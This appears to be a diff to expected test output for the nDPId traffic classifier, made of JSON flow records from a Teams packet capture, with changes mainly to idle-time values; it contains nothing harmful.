00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Telegram","breed":"Acceptable","category":"Chat"}} -00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Telegram","breed":"Acceptable","category":"Chat"}} +00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1587041684306,"flow_last_seen":1587041685465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14487,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1587041684306,"flow_last_seen":1587041685465,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14487,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041682809,"flow_last_seen":1587041688190,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2932,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041682809,"flow_last_seen":1587041688190,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2932,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1587041692808,"flow_last_seen":1587041695538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1225,"flow_tot_l4_payload_len":4100,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1587041692808,"flow_last_seen":1587041695538,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1225,"flow_tot_l4_payload_len":4100,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Azure","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693428,"flow_last_seen":1587041697999,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1201,"flow_tot_l4_payload_len":12443,"flow_avg_l4_payload_len":401,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} -00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692528,"flow_last_seen":1587041692578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041695305,"flow_last_seen":1587041698021,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":1214,"flow_tot_l4_payload_len":7582,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16332,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1587041695305,"flow_last_seen":1587041697619,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","src_port":16333,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -567,8 +567,8 @@ 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1587041682740,"flow_last_seen":1587041682856,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9052,"flow_avg_l4_payload_len":565,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1587041693597,"flow_last_seen":1587041695591,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1414,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693515,"flow_last_seen":1587041693640,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} @@ -579,20 +579,20 @@ 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693668,"flow_last_seen":1587041697714,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695421,"flow_last_seen":1587041695433,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1587041676612,"flow_last_seen":1587041676808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8429,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1587041685251,"flow_last_seen":1587041685681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10159,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041686889,"flow_last_seen":1587041687253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10175,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 